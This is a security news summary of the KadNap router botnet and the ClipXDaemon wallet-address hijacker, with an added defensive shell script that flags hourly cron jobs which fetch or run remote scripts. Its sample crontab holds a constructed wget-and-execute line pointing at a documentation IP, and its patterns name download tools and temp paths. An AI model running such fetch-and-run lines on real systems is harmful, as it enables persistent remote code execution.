A new malware called KadNap has been discovered that primarily targets Asus routers to enlist them into a botnet. The malware, first detected in August 2025, has infected over 14,000 devices with more than 60% located in the US. It uses a custom version of the Kademlia Distributed Hash Table (DHT) protocol to evade traditional network monitoring and is being used to create a proxy service that claims to offer anonymous access.
The malware works by downloading a shell script from a command-and-control server, which creates a cron job to run the script every hour. The script pulls in a malicious ELF file, executes it, and deploys KadNap. It also connects to an NTP server to fetch the current time and store it along with the host uptime.
The malware is capable of targeting devices running both ARM and MIPS processors and has been found to target edge networking devices beyond just Asus routers. The Black Lotus Labs team advises users to keep their SOHO routers up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life.
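As an added example (not from the source article or from Black Lotus Labs), the following script audits crontab text for the persistence pattern described above: an hourly job that fetches or runs a script. The downloader names, temporary paths and sample crontab are assumptions constructed for illustration, not KadNap indicators.

```shell
#!/bin/sh
# Heuristic crontab audit: hourly jobs that fetch remote content or run
# from temp paths. Patterns are assumptions, not KadNap indicators.

# Reads crontab text on stdin; prints "reasons<TAB>entry" for each hit.
flag_hourly_jobs() {
  awk '
    /^[ \t]*#/ { next }                                 # comment
    NF == 0 { next }                                    # blank line
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }     # VAR=value
    {
      first = 0                       # index of first command field
      if ($1 == "@hourly") first = 2
      else if (NF >= 6 && $1 ~ /^[0-9]+$/ && $2 == "*" &&
               $3 == "*" && $4 == "*" && $5 == "*") first = 6
      if (first == 0) next            # not an hourly schedule
      cmd = " "
      for (i = first; i <= NF; i++) cmd = cmd $i " "
      reason = ""
      if (cmd ~ "[^A-Za-z0-9_](wget|curl|tftp)[^A-Za-z0-9_]")
        reason = "remote-fetch"
      if (cmd ~ "/(tmp|var/tmp|dev/shm)/")
        reason = reason (reason == "" ? "" : ",") "temp-path"
      if (reason != "") printf "%s\t%s\n", reason, $0
    }'
}

# Constructed sample crontab (192.0.2.10 is a documentation address).
sample_crontab() {
  cat <<'EOF'
PATH=/usr/sbin:/usr/bin:/sbin:/bin
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
17 * * * * /usr/bin/run-parts /etc/cron.hourly
12 * * * * wget -q -O /tmp/job.sh http://192.0.2.10/job.sh && sh /tmp/job.sh
@hourly /bin/sh /var/tmp/.cache/job.sh
*/5 * * * * /usr/bin/curl -s http://192.0.2.10/health
EOF
}

# Demo on the sample; on a real host use: crontab -l | flag_hourly_jobs
sample_crontab | flag_hourly_jobs
```

A hit is a prompt for review, not a verdict: many routers legitimately keep scripts under /tmp, so compare flagged entries against the vendor's stock configuration.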
Another new Linux threat, ClipXDaemon, has also emerged; it targets cryptocurrency users by intercepting and altering copied wallet addresses. It is designed to be stealthy and can target multiple cryptocurrencies.
Source: https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html